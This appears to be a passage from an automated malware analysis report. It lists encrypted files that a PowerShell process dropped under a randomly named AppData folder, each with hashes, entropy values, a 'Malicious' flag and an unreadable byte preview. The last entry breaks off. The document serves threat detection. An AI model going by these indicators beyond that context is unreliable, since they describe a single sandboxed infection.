                                                                                            SHA-512:16CCF7BA4A6D15F2EA9E4EF967DE0DDFE73536D3D52D544F2730438E1BB455BD107D8AFF7A8A645092B9E856B16155CD2B688EA3C2C1BCB7D4B132834B36A2E4
                                                                                            Malicious:true
                                                                                            Preview: ..zv)r..RG....M.tQ..........Dmm~...y....i.....u....).w*.E....:Dh.r.p.u.D..c#..D..a....g`U.+.4/We.CZ.?......].-e>......py.....g....;}.....!...c.P.vs..../2..0fy....{...(.-.N.....er..... Nk......c..JLw[K...A!QA...#...|.Q./Ev".......L.C8c.,.......]".i%..S9..Mw..".....|e..$.xs.|.1.f.....04..m...4.8.*...g....+n..'.'."...r.oo.C.R.\F..EG..T[d.w.eN.4..D(m....._.[\.....M=.o.p..k..;.D>....:OC.,9...+.H.x=.*.Vw_.&pj.>...&...l...5.h.V?....\.....Q.L.Z.....9:..3a<.?....J..v.-....3,.Ux..:.q.....u.r8.6...)...p.5.F.....!..M..>{a.F..s.x*.,...b3.^.....8...Y*.(q.*..|......lI..WT....=Y.+.tr...CC.1.-......5.A.,...y.4{TI.e.pj..-)..W.'.....\#..Hp+.[....r...6.....;c.e.9.l:..%.{s'.....!z)....s.{..3r.|.|;...L.......6oDAZ<%.Pu..}...?...#UE";......(..si...W.+...fB.MWY.z..)!.._|.Y....$fdM...l*..E0.....G...JG.So..:+,{.....~.Y.......d.... ...bI...XE...|.....qN.<*...:.=..Z...s..]d!..H.$*.+..|.8...@.X.Z}...^....<...a)........o.....[...X.6.....?.....L..!.Nw.~t1....R.\....F
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\KwrkAqLXNRpPWEaic.cInVZjfmQkhePG
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):123958
                                                                                            Entropy (8bit):7.998565364880759
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:PdItj7hLKbmxBi9TMagLwVjlHj7wRmXK0MwrIh5y/96KE6Yj:PKhcXMunYP0drCyIK9Yj
                                                                                            MD5:CC5B7C6C0370DAF5E06DAAB8F94BE9E6
                                                                                            SHA1:8C64C3347D26DBC328602923B5233F8F95D37E0B
                                                                                            SHA-256:050119C703119526030CA78622CD053157D7ABFFAA4D8AE7EC0B4E2FC0D15B0F
                                                                                            SHA-512:23535B1CE32E58E2E230DCC73B1058DFE2BD41ACC8D4BFDFBCF48B8BE661D32368708B41FF34148B89E405698F8DADDA2759B4FC1394E8090E3A8DB6355E5143
                                                                                            Malicious:true
                                                                                            Preview: 2....9.k*.".......U..n.\..QY*...^a..}&....em.4N.(.E.MA{.N{....$....dh._.A...|...d..G,F...%...|XSZ{...T.pu.._.j+..Z..:.~.].\..Q$......)..9.+h....".f .k.yB.>U.\d..O...1.[c.E.f...../.5g;."}.iS...fVk.@.....&..My.P.-...f..Ki...h,......>.*.Q.=k../@...W@.h.U............e...t..yO...[).M.5..}'.U.X....c..q.._.J..%N.^..W]T.=,m....]8.I...C.\.5..t...%p+.2K.mN4.'E(.(~z....1z.;(...~eY.U....D.:......"....P>.....mj...\/..tN.....<qHx-...c.{...[.f.....*...l.JA(....8.d....^B......Y...mG..7RJ.!...w#..5.}.q.hZ.k..i......m[[P.=....<..W...X._.....9...Z2...-.4%..{u...=.!...~.q...?........9.:a.'.i.5..T8..[...0yZ....;.0U.jYV.%V...Zu.YW.#..S./...........I...J...b.....x..0..q...?9.N..pW.n...xO.z...Llj.*r.'..3..\R.Fe.T.b.D%.1K..L...b..#.jI~.;.#.&.;.8l+.&qu@..g......A..I...w..$..7...x9...d.....E...y.,........4g.3.EU...J.N.6.L.}.:de..r......a....'a1.?.8H......)...owj.....P{.N8.:..Rm%...:..0...f......f9t....0.4^.......SQ&....h...M..E.4.O........X.....@..hdE....e..W
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\MRNJVswYOBZSUrvGz.nZMvFOCfHi
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):157089
                                                                                            Entropy (8bit):7.99904685562989
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:gXTbtarnNq0k+3v/4ZPngMwpA4TVPI9KiCEln2xlDj+l1TIgrE2ddB:QTbta1dHSg5AE0dl2T+lxIWddB
                                                                                            MD5:9A3CD28929193C49A6CEF5B4BB0E4A15
                                                                                            SHA1:DE02AFA0BE97D61BE2F9B421EC6CFEB6BE05CE19
                                                                                            SHA-256:6F9F907E2B2802FE1EC2AB34D119B8B60587537224DE05366AEBB633E2F3A99C
                                                                                            SHA-512:A1FB924073922088756899D47113B105D859F97BFD95D90B8F9E213ACD61B8E2917200F9D015B5F75BB763B146DD24944FE7BB7264704E12312FC538E15D54B1
                                                                                            Malicious:true
                                                                                            Preview: 3.?E..@.......U..i.w.h)..o....r...<..|...........^.d...lU|..xoyFs.qF.}....4..z....b..D1.^..^2Q.....R...-..+~.j.....8.t?._.5.M..q.3..4>.....4.U...W............".....Z..l)Qcz.......;_...<.>.......^T6..".V7.E....QoL.UU....q^@v........<.6l|......:.......p....."X)CR.....(..U.8..$H...3... ..>...w.W.....".\... ..Gnq`...i.=W..[.Z.. N..K.....C.V1..}G1+m..E.k..._s...%...U..v.......=|......D-..g3..;...I...k.r../.."...& .Xk(...~...!/....&-Gq_.~.0.E;.....B.....].m........y].T..*...BK...o...r2D.[.y.].?..S...Y'.\...!P.v..,.@F..Sb.s:..D(..].....:V..^.y.C.*.R:...q.Hj....(7..b.WQq.....j=..~.7.,7..j.t..6L...e.u.[......K..^R.Q 5MM..,*..S..\b...'!.3PE jfZ............[.!.`..U^./t.......Y.p.2..J.>..5..$i.w..?..n4..}A>g..R"..i=lt.E...*?...O+............J....97S'@wt.~."....7...5=r.j..]...9...?...O4.Sg..x(X.b.%......t.0.6......qs...@<....B.....^.........ru+...c..X.....,2......SO.}.o..gO...\.l}_q...;)..})....)T.....\Bn|..M..euR8..}S.~..2..c..N._Z\..NjV..
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\McUgHjwPpkTros.FiVAMbepdtvDT
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):178720
                                                                                            Entropy (8bit):7.998759197450374
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:QUp3a5OG4/jo7MDEUAnfMygcgDJmiKB3ruPDWLjsYYFVjPLsqP:q50/AMIUOfptgDciyKPaL4VYO
                                                                                            MD5:B8FDE73B2B4CFA32A54AD319E48E8A0C
                                                                                            SHA1:267959B70C4342AB0FC4A5F6B5E5B19068991C95
                                                                                            SHA-256:C042DE7BDD1588C2E3A55B48E9DB58F8902A81AEB37128A71E698B0B4D8B0958
                                                                                            SHA-512:BE3F4CFED6965E84C7BD78E70424208DFCD922F9AEBF1DD6278E35190EE6156AE4322118509EDC1460AE6A779FC492BFF460965913D04E563601DD96A24A6B0C
                                                                                            Malicious:true
                                                                                            Preview: ........I.`.../.n1..e l.YnR....'??..vu.`g..w.f;g...`... .8@|..A.9...{..x...x.4.3..?)....S.t=x.j.e...gfkH.C..N+.E...~..rw!..!... ..m.1...C....h..kS`.M..IE..&+D-d@;.%.@....(..U.~z.T.#.......~.C....+F..yt.z....h...v.+.?~..........h..(L[.m...$...nR..q.aD....%01..G...)...!.......[...%.....}r..o&. .z(+C.P........dP.D....@...".V...c..*...1..z....5[.j.+....,..c..@/.9.B..\.....X$!R{u..q..q................)6.v.uskp..N4;.P.<Ge.j..9.....}ktHlr...L<.,...Q1~*.R.......k..J9...0.g).(n=.o..r...Y..j..)..fu......W.9.,0f.......M.....9W..e......8.fe.=.O..3.p.n.T<.....]..-....^.K^.....a.i$Wgtv.|........\vWh..a&...S.9.;...v.NR...Ak.O..*..w.0..G....J..T..#..Q. ...t..z....=..n.o...e.......e...uF..&.7..t..,..0~.?...u.....R.._'..Z.......Y..MY..b.oPR*.IA..?....x.$.....[..*.i-k.7)..hr.OG......i..!.\wk.........f.{!{.o.....F$.h....wkp.0.....#c...Fv<}oW/...a..+.S.f5.J.z.I...i.@/..b:NP..A.W^.t......Yp..3dAD...2.....I]!.M"P.D....o0j.?....."..,{....A...#.=i..0
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\MisYlNcbAgIjX.zNaCVgrfLoH
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):169148
                                                                                            Entropy (8bit):7.999005464721027
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:uC6V6h1AE74VN7NHWA9S8ikZOCeCr8dFF+VYowq5oH00eDT9fO2Uj5:bO+1X74V90A95iCOCn8H4VYoB5oH00wM
                                                                                            MD5:AE8C4033F0AE7AE1D47987B5BC023419
                                                                                            SHA1:375842CC23D18BAFC9F3737DFAD01EE68A76DE5E
                                                                                            SHA-256:37BC8AE4B9AF24B1548B4D762EE2456D2779B5270EF34A63A1B1F914603D7935
                                                                                            SHA-512:F31C7E333E28A9C4048A1BD92410DC314B37B10DD8980715C342E66CF6157FFFB7788B05B94E7886518BDB084B4174DBD33778DF426EC0A2E7AF365DD064A3A7
                                                                                            Malicious:true
                                                                                            Preview: ...X= H--y.....\..M..2S.......j,*..F....$.:.4 .b<...OfT..>..[.sa..h.....w.3..V.N...}...Z.F...m.~P7.Z'.....3;.v_.G.z..8..q..I.l..R\....m.k....[JF....C..)..l?;!..n.p.$RXh.&..3.p}b.......}....0....q../fp..+s.6.......:....:1FW...!..3.9.G.OlG5:..W...u..S.5*R.D.._.-"..d."T......R......4S?u..T.e|.....'X.!..=.9..m..pl....f.].Y;..`.p...'2.m/.><....y.z.../L8.c!F...!....I:e...(....p.....|`..x.h&eqIc.4..b.@F;5.$.......c#..}Hy.l..Y>.N.d.`_.Pn.G.l..._P^Z.@. .....J..@E6.g.u.M..?..bLi.;....-C..v.|#"k.&.y.f...}S..j.u.\L(.#v.1v...a.....6`E.&....1.v..D..x....<.a..5..v...%.,3..@D..n...6UGb.@.N..y._v......pE..CR....?Y9.F/..D:..5G.S......&...<.~.1.[.]...0...|z......l...3I3..5..[U.k.S.!.I..y..1.xx....=...1....&q....OJ.z0_..4z....D..n4.k$.S:+.E..>6.o.OCcjH.c".R...........E|M........8U.F.......M.R-..] .`.......q].....o..)....|..2.=.0{..7K.05)D...J0..j.....Y..J.N..J.,:.M]v.b....xF2.`tW.....V?Y.../4....._.$..e....G...;.|.....!H.f^S.."...c.......j..{r..'Y..A.j....}....^.Z..*M
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\NMREBxycaFdrlbuOGUk.DbeWJYKnNLBmy
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):158637
                                                                                            Entropy (8bit):7.9989074698257525
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:sy1/ooVJD+Db4ZEAes+4H4qrwUAfKKZ4NNiBrDgJAYJq+v:syVFJOb4ZEX6wuCoKrDHYJNv
                                                                                            MD5:F8636373D73D2C55DD17B2AE65DDB50A
                                                                                            SHA1:96CABD5CF663A962F1D657B0BE427113F8854A98
                                                                                            SHA-256:4CA9D024056D98FCCB273FA27557CCDD8196692351131C41039137B6E8A0AADB
                                                                                            SHA-512:01312BD1B32CBD5B0474D5DE6809719CC170297D3DBAD5B5F42F2F6D1CA9557D81A45E1AC0C1B95D83E77A3F2BED66864FC479BFE02E918DB502C8BFDD7D1A37
                                                                                            Malicious:true
                                                                                            Preview: ">0.S..I..\Hc.Ta.]_.Sj....a.3..h.8.-.ZP..W....6+..8....$..`.(..m.)../.2B.4...V*...O......h.I..'...'........I..56.......;&.&B....O...u.H.#D.t.........g...[.G...F.G.1..X.t..be'Y......F..."..k....RN..,...~..)...-u..M,.....R(..]....dWT.Y........cP..;%N..j .c.U..).....3..O...DmO.f.mz.t.3#.hY.-\..-.2..G...%.3+.@..e....U0x......I0....&.|_{.N(...(S..`.1jE.i.H_...{.o.m...~\....x.'.....0......3.r.....h.....>..!.f...Z....J]..@Z|.X.9....p.N..S.'.#..).u....Fu...t...-..FsT..L.86...@R.....oF..P.VII..90..1 J.^..Q.^".....?..x8?/.7..._..o...D..6..!4+c.QG.o.....vo.!...c#w.J..Zm......i..D.....~.A..v..@.~..b.]zM..j....f%aJ..%.l.]...@DK..~h.r.^MT...kD...[e...t.....?..&.>.ZY...............U.A....y.A..",w.......). Ev.O ..HDP.Q...r.>.....<6J..,n.h.*......R.......V..E].....|s$[.k\H...$......h..<,....w.X$e.._x-n.h2P.aQ2.u...0iG?G.B...{<ea..<qR..va:....k....5*. 1.+..M....>.TK..0...|M\...k..,e,..T'."(.t..D.......7......Pi.2.<..I.Y|..Z..{.uuj...'-uxV.W#c.!d....zH.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\NSTBOEHtRMVxUwzdC.eUitPRVkDsJE
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):98622
                                                                                            Entropy (8bit):7.998379920126077
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:ygtvFs2THvfhk+RO3rWR/iSGyMEFVSq8t9WC/vH/uLgo90sCxG:ZtvrvfhErWRKziSpt9WKI0FxG
                                                                                            MD5:A25B81CE74779DA1409A274879F77AF7
                                                                                            SHA1:C995A39AF9A24BC69B57A214A9F374D8BE8706EE
                                                                                            SHA-256:49A8669005B6823C2626FAD09A81CEFE3329F45EEF389168A9D3678DA8A276C0
                                                                                            SHA-512:8AA6B815DC617BBEB27EC8ECCC441440532C8E57E8C1DD9C504E71E952510CB8CAA18DB2F5219F9F846432BA9283D3A5D6B97B0D3E04507C1FF04F957DBF7864
                                                                                            Malicious:true
                                                                                            Preview: ..~....@U....h.P..Y...b.m)..%...v.xv6".....:..p..@D.QIu..3.En..x...Q....2..s.bW<......,...DN.@Yv.d...%.f3.Xs+.........F>..v....D.....Le...-..1.Eij...~.n.......-.....;{E.E....r.0.E.2z.....X..+b..^.Zs/...9...=..ab..GTP<.".#........6....E...v.f3....t.........fk.*L.N...y..J..|.p.K....m..7.....l..|.5.........\q.a9.}.zIS.....:.s.t]@.....f.d..|......X.../.....Q...Q..c.=w.....Z.....g..>.k....h....'..D..Q4....j.V.rZ......E.O9%.....f.].c3....z4d8......U.y8.t....V........7:....*.S/-K..l..$..2....#\uH...HA...~..J.p....R@..ry./m...7O%.J'Q..}..G...:XF....Z..'..O9..pVJ...1e6s(.RU]c..n..[`.Q...D.C..+..X..W...{1.T.DEZ%a.B..~;.. |0s.'...G<..I..N-k.`.S;...q.i?o(K..-*.;..J..]....!.. .>..0.A..... ...M5.g.:...k.(M.9.4....=.....x..n.X^...@N..;......`?.1....lT.jF......>\...E..0.y.N..t<....M..~j.N:...C..........<..$^..PI....!.....y......3.....BN.*...wS...o..g..\)D...u.........V..o9.F!+e<k.U..y..<y.e.*..$q..:[..........t+5.....P.D..E..".M.0FE)..\q.&U+.~.{.S
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\OKVaIsnDYSru.wRkYivJdPtFmOBqUgE
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):52302
                                                                                            Entropy (8bit):7.996123944088648
                                                                                            Encrypted:true
                                                                                            SSDEEP:768:SlxOSVWcXGVLeCAULWzgsxrGNJO1UgVvTUIdYz2Rp+KupcRUJ/cPvcq4kr:aOYMLFM8RJ+bVvTUh6ttW/cncq4k
                                                                                            MD5:91A6DFC6B979730E47B5CE23A2BC4A44
                                                                                            SHA1:6987011046689CCD25B9F9C2A9F7BE529B202885
                                                                                            SHA-256:D10E6E70B386E3010F590F078C2DFC44047B2ED42F2DC5A6CA0A42A5EA66028C
                                                                                            SHA-512:DDA666632D4742F2D12A7EF9120037791744B1293B5FA53056E4BCA72755456EB2E917A015BD8989C4CF3879DBC5B545B257CC66F769C2FC1591671B3A67CDC0
                                                                                            Malicious:true
                                                                                            Preview: .,Pw.I=i..$..lPK..^......=..o.,q@.=.Zx..7INz\G.WB..:.kA!.f.=R..L.t...y.&...M.<...-.....}.8....=j...lD......c]..K....../.A.u.P...m.Ne..SIN...B.8.q.s|c.=M.WW.U.....d.og..;..>f....4;H=h.G.....nx.6]yp]....'... ...._f|..n....F,-./%.o%*ZqrA....("............j..5..z..;..{.L).$i.}_D=~6...._.F.."9.uA(..."s.v.).o.c.jc.v..Of..i.*..'`....[....d.}e.:..;.jDsv.+...L.`.G....5[...Z.9e#..s.....G....A.:..5..+..K...s..uP...`.c`..2.... ..0>...z.c5./.F<MgS..12...).mGN..u.7.SQ%%.U.1i..K.M...t...q..e.M.7#].....v.4U.t.Gw....s.t.{.........FQO5.MM..@....I.jZ.t.z.=..]MKN.{x.'..LKe.3.{./w.T.SE5.h...0f.s....9Sn.jh)_....H.p.....F..m)c..t>.}..#..#...8..}CB..z7.A...z.LD..v..r.L.H...pt.g. ......<.j^.5...+.;T..K..2..g....rT.#n.ds...}o.DY...N.E..jE..St{f5-.`..x]..[..g.".J......\.O..8y7.HBD.c.SU..v.K..t.*.e.Isg..o...B#r.$.>Yv3.......q.h.NCG...}...pIFS6t.,6<....5..........*,,...kO.6.?.}E..2e..........WdRs.H.gu.Gq..j..i.F...X].xh.(.oj..e.q.)t..S...X4.w2.5p...l.$.L...........U*..M...F8=.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\OMNSVpazArFDcgyd.UOYuHkRgaSNFJojlxev
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):132169
                                                                                            Entropy (8bit):7.9984277169087505
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:iEwmiS7cOxuW2Vs/Dt89Vg9FVaq6iElgfhPVY5b7YgLPCZOB70VuFBSziY1fTEJY:iERTLxWwDtag9FV2PjrOu/yTEJ55Vfyj
                                                                                            MD5:2995F00403588F855AF5ED7E4B79C1D8
                                                                                            SHA1:A62915184EE4A857E29C39A992F51C776017A827
                                                                                            SHA-256:029F5E8E33D9B5702ABF71BB10A0C4468C882CAD012CAB573381390ADF7283D0
                                                                                            SHA-512:82DD45AC38D63E631ADFB161A74953F18CFDC5DA3AFA6A9779EDF4B830C19557F57A0B7BEE530789A66F9766E200644CC4A99A5D1D33BAD5C54AABFA950995E4
                                                                                            Malicious:true
                                                                                            Preview: s..$,.....K..).^....l..-....q)...Q.....1..q.m.!.. Q.xD........]x.H...I..X......P..{J{..w.1"..]%4...1 T...6.......b5..+6.&...m.S...z5.j&.m..n...~Xwg.kW{.ln...r.......jGS<n!.D....zB.3....../p.=.mK....../...5be.....0.g4.kt...1'.......T. .t2j#...-...\..)K./....l.......GH..AW~._..]....p3e.....f{.......;t.K...0..V..s....VR...Y..Vo.yO...; .......-....E.[..x...<qA&.....6...0.l...T.3f.a.^<...to........[G8T.p..J..Y.T6.m8.'..e.......$.}..R.<.=..!t....K8.V.....vo....I.e|.I...../.hN...<...xp"U...j..+.:....N.2....a. ..H.....&-...s.(...<....%...S....'.T..............2..Yn..rV.8wJu.q.m..._!..7._.;).....(U...9OUL..[ +.6.lj.8......N.....E| .Eo..A.Ug>.T...U..H...Q....F.i."&..l..oG..\l......]....u0T......bZvU..S...._.t...{k..(..r....z.2K.S....S........=#v.H...c81...*..B.j..y......:o. .\....._....).0{.}_^St.u..$mX...ak..oX.W.......-..)_..d....q."O.E....S.P...b..>..F..g^....z.w..US.$eP.].re.>o=5.~;t.L..>C...#x..C.|.{.&.7...E.^..X<......".....S.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\OWbwoVzjxLNB.IjCdUZyGoOJmRuXAbt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):80241
                                                                                            Entropy (8bit):7.99777290932236
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:XtMyG+67Q7z8X9rh3vpf2zMLBmtZTk9SRTj1r7HptYvRxNhcMp+J:6yz67qzK9NvxmMu+9SRH1/HQvVC++J
                                                                                            MD5:49CE78333D7CC1C59D042E8478C5826B
                                                                                            SHA1:F5BBE7A30B4D0E2718E9B7DAC52638343B4F0A0D
                                                                                            SHA-256:8B2FDA14CB682620DDEC5BF32C8B32AA5D785E2292750AEE8CF8196EBA274422
                                                                                            SHA-512:B94AAF72BD6EC22436F33A6834FC78B5250758B148F1FCE54F57BA259CB42FCD8E8D5B22EB0C79867B96381C9CA62120AC1D1F961B9A890E30ABDA0FA9FD5794
                                                                                            Malicious:true
                                                                                            Preview: g.....a4Q...R8.iz...R..}^.,.P..z..-vV.H.>...y.pRr.F.V..MX.........'..e......h.^Xd.#C.... r..tfd.GJ.B..O...m.2.A....+.A..B...9.....t.0.S.fR...zM3.s..A.....X...p.G..zm..&....J.qVp,..v..j.xn..s.Y.[6.Zcq....}.?.p.....KF......{...>;...Zt.4.4.+9.Y......X5i..9iC......K...).o..1y.8..K....IS..O.9.......\.2..4.~0e^.`%;W[...G...U...W.5.P.`S..Vd..g{`.}5.t5~..?.SA........f...zm.,5?-.bhsdC....!L..^......<.-P..g...x../..c...Y......X4a:.%.E.I8jSy!r$$..3./.p.rKR..N:.x>.oM..dj..H.E{.$.2p.B1......>U..}YN/..._...*k.s.3.?E..-...#...^N...,..g..?5.]&...(...m,21.k...a..r..H.B.#..Un...yH........5....[......]I>L.cn.5..TB.3...]. .M...S.e.u.N...Q#s...D.X'....#y.(..S......~..F5........*y..j QJ.%R..qU.mq.e.GBw.I6..M...T.T#.+.4c..).7/..-...6..!._.>.3..._E....a. `_2h.S`...s...z.....Z5..a(.....8..Y[-.Wc....;..[...*.*.v...B.ih:.4z...]n"pR..& ......./......z*.1.<..o .U..........20K. S..Z....M?..._..V......b. ..=...v....O....:.c......v...L......p..W.V.....
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\QSGbAcBYTIxyp.XuYMCakdHx
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):51837
                                                                                            Entropy (8bit):7.996496691894263
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:QVf06NnJDa64xylhJLQxh8S0V36j2oLTC3SjN73M:QVPNJDx4xqr+eS0VKj2+CSj58
                                                                                            MD5:5F48DD05DCA254253FD474BAF42341DA
                                                                                            SHA1:42D4F0D1EF756F14157FFE5EE175CE74A1F43AD5
                                                                                            SHA-256:7BD45D0D50941E42AB8202E99F3C4165536E797DB5BF643C99BBC57E1A13B6E6
                                                                                            SHA-512:4D4E4E2D366ABB7D3ADB39E543274DFC01304B95578D518CD10A11D505606EB9C6FE417AD70671D2A7F07424C61E955CA8F189FCDDA07ED2C4BC681182555C78
                                                                                            Malicious:true
                                                                                            Preview: ..G."..E...k....h......#...=Y...C.5...].".V>j.....id.P$.,....(..59v.\=.m..2K......<..y0.}.`q...mT.....k....[...J.'#..E..mW..V^..........6Oltg..;1....).....H<_h. s.v?....r..U2^$.8..X.."....0.....9N\V....$..O....I....dSB..|.A.....J...R.p.kLG.W,.z......b.ruA....e(.r.u.....i;..u...N.\7../..?~..B.$Y..+B.,.7`*9..q}.g-;.P....o.I..l.sg5#~.... .........]...0.....NU.Vs.G..0..0.`.[..lu..F....k.M...V?.....\.P.D..,..-.}...4_..+../..6....#.1.7...E|C..6....NK=f4=..._)c.p.._.e......AJ.<.q.rq.{8.w......J..TK...pg...a....2|...<z......:A.......P..Y......_.Kf.f..}......n.[A.l..(.."mmp...Q.?..sV.$......:.....=x..e<ym.2.WU/..H..^..JP2.}.......w.h...T...]+P......P..G.vm...-O.UW^.y.`.).c.,!...!..'.|c._......u.K..rX1u'S.q2IL....T....(G.:...2.I.r..]......8H^......&.0... .vD.-B.......{..j...g.r.......Gw.U..0r.....o..o.......j........o..%./:{.v.B...{p......N.#4..9......Is..{.(.(F..-9/.1....;}...\=I....q'.N..i../0.I...?<KE...[.]..{.....?-.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\QWxiIaLeDJzmp.bXhgzQZDBsjdVLyaIOT
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):75290
                                                                                            Entropy (8bit):7.997309833699159
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:bYx7+oy5Ifs5QFO4CroNlTMSmYr0nTrYFi18Ed/k1cr2:M73yyq0OGT26F68Ed/+
                                                                                            MD5:2E010619A8556C0F799EB4CDD25834D6
                                                                                            SHA1:79EC088A3408C07E6299A16948B5F76E72EAB1F1
                                                                                            SHA-256:EBC91C74709DDD3E20E04AAD1A2303AE0FC71F9267E22788F3A246B969108530
                                                                                            SHA-512:DFE03F71A88D794EA261F09C679064FFB42DEA3C5B5EC40996FA4C8AC8CFEFE26CB663C4141C10891F859806C464E378718D5B6BE521D467F98AAE92D9301128
                                                                                            Malicious:true
                                                                                            Preview: ...dC...2.. .....#{@..I.7.d R^....*..J.e>..."w/...y ...s,..........O....IM.#5.K.k.w.A.4.+....]...P...)b;9.R&..w>].6.....#.H3..I.]..K.A.<.s-....S8.'%u...-k.....f.(./...S..(U.{}.....$.a0..x;.I...0s}.#&.2....i..........b&...{.tg.......>.Rx..Y...;M.+$w..28zU.l$!..*5V.f.F..?..@G.<i..Hm....v..7.,."f....p./..u.....>.T.P.i.1>.a..$phV./........$......S?.......$~b..f...dX....<...V..<b... Q.b$[..u*......$z...T.?..%L.....T..V...e.7..|>a....iS....(d.I{1.l..6w..`K.....d......C....#...x..8..h.?..X...M...v];`k...n..=..Le.....j!.....Y..$.B^<\.v.!.rQ.h.....D5..<..q..&..h...)..^%.o.d.]c...@.6"..2.......f...>..!..z.(T.()9S.r.....{$.Y...CZ.o....P$.....G.....&.m.|... .t..I.5.cr....D.....I3U.....~.!@.<.@|...a...o.8.'.w..YE...3..o..c....ZJ.I...P.j...s.-S..WL..)....B0"...a...7.=..5j..q....b.0...'......$uc.{.F@O..kH, ..(....QC.X.....C.x..d...!x..C.../@...L# ."X.9.C...;..Z..d._3~....bCS...x..............}.:....`..aJ.U.K.....E...Xa%...K{.E.m..K.........
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\QpJOjRaPitKZ.PtKJpRLHWn
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):198985
                                                                                            Entropy (8bit):7.999190369174077
                                                                                            Encrypted:true
                                                                                            SSDEEP:6144:MKSSYG8tYl2MigCxrmRKYgjxJdhIF2v+b04cbiQd:0XPnx6RANhpv004Ls
                                                                                            MD5:CD073ECCA9AA4B4D64695F68E123DD80
                                                                                            SHA1:F540C248E9510DED892AFBB470155E5309A0513A
                                                                                            SHA-256:9EE667E41D37B6F31201A2E12468FABAB31715C621A83ACC742B369855738CBB
                                                                                            SHA-512:009EEF81C6E6AD55A00B734B21E3DE50132B03D1069794090745B1695D25F4E921416A3C992B9E1C3A2356E2C33AF69E324BA0F71BBB0BB27A49376AF099A6C6
                                                                                            Malicious:true
                                                                                            Preview: ..Y`..f..$...._...>G....y../.#.....@WG!..0.e.%G....*yF.....^....Lu~H.k...5.....H..H....,]=.[._........By..'......&.{..h-.U...{........&..$n.PV.....%V.vmj.#.;0.%...a.c...M...3.".Oh..c>..G..T.I.bY1D..A.`.s..#.%."=..".L7....]............0U....sw....6G.\.?.h!.....A.M76.c..y.._.......x!^...mj.X.E.)...C....U}.:..2.n........M..............\...bOX.....T...P.?t(..c.}M.84...@..+<c.3-*+x.h.$.7..l^.=...YTh..+......A@..V...<.B.....ZI.~....3k.T...#..]q./R.....j.I.@...+Ef"."...0.%..4.b.....6Y.W7!..`22..H.Nw........f..O.}..\..^M...E...X......../._5.x.._9..!rfe...L.)......m_...R.uJ'..... ..V.7..x<.j..].~.o.f x.y...=w....%....|.p7.F[..6.I..6*Hd....j.......<..J.@.2.6?.....<..a+....VJ(Q..a.~...c13.o..T...5.t.. }d...7........q.....].+....N....9...'...S.G..0..v..4 .~...c..NURzc..4...v59..S..v....^^..7H.<..._../.BC$V..D-FZ_.@...5....39...r..Z`3>.8@...k...[.[.{......#p..d....3....OM.....a.>.m...`.s....l....RtNH_.,y.................u..........w...G....S..~.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\QzlyLWCNAPcGtTgHxr.qWXzuIgseixTtYcdarV
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:COM executable for DOS
                                                                                            Category:dropped
                                                                                            Size (bytes):99437
                                                                                            Entropy (8bit):7.9979710008705815
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:Mmy+WED+rV/AwuakxiRM3hNMVAiKGQmoQDAGXDqA2a8vWZ9kMUiKNnm/arnGJf:Mx+RxxiRMR0ANnQ7DyaZ9kMUiKRmSr2
